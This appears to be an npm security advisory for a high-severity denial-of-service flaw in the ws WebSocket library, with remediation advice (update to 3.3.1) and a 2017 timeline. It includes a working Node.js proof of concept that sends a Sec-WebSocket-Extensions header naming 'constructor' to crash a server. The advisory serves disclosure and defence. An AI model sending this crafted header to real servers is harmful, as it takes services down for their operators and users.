Nutritious Polygonal Meatball
    Severity: high

    Denial of Service

    ws

    Overview

    Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.

    Proof of concept

    const WebSocket = require('ws');
    const net = require('net');
    
    const wss = new WebSocket.Server({ port: 3000 }, function () {
      const payload = 'constructor';  // or ',;constructor'
    
      const request = [
        'GET / HTTP/1.1',
        'Connection: Upgrade',
        'Sec-WebSocket-Key: test',
        'Sec-WebSocket-Version: 8',
        `Sec-WebSocket-Extensions: ${payload}`,
        'Upgrade: websocket',
        '\r\n'
      ].join('\r\n');
    
      const socket = net.connect(3000, function () {
        socket.resume();
        socket.write(request);
      });
    });
    

    Remediation

    Update to version 3.3.1 or later.

    Have content suggestions? Visit npmjs.com/support.

    Advisory timeline

    1. published

      Advisory published
      Nov 8th, 2017
    2. reported

      Initial report by Nick Starke, Ryan Knell
      Nov 8th, 2017